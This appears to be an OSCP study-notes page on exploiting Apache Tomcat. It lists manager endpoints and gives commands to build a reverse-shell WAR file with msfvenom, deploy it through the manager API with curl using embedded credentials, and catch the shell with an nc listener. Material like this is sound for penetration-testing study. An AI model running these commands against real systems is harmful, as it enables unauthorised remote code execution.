> For the complete documentation index, see [llms.txt](https://dhaneshsivasamy07.gitbook.io/oscp-2022/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dhaneshsivasamy07.gitbook.io/oscp-2022/enumeration/http-https/cms-exploitation/tomcat.md).

# Tomcat

Tomcat is like a secondary service usually runs on port 8080

### Intresting Endpoints

```bash
/manager/html
/host-manager/html
```

### Important Files

```bash
tomcat-users.xml # contains usernames and passwords
```

## Exploitation

* Create a malicious .war file deploy it and obtain reverse shell

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war
```

![source : hackingarticles](/files/ppQ2ov9yqXW2B71zZneh)

* Once deployed make a request to `http://targeturi:8080/shell` to obtain the reverse shell

### NO-GUI

* Whenever there is no GUI, the malicious war file can be still uploaded and deployed which will lead to obtaining a reverse shell

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war

# curl --upload-file rev.war 'http://<username>:<password>@<host>:8080/manager/text/deploy?path=/<deploy path>'
curl --upload-file shell.war 'http://tomcat:$3cureP4s5w0rd123!@10.129.113.205:8080/manager/text/deploy?path=/dnoscp'

# listen for a reverse shell
nc -lvnp 1234

# make a request and obtain reverse shell
# curl -L --head http://<host>:8080/deployPath
curl -L --head http://10.129.113.205:8080/dnoscp
```
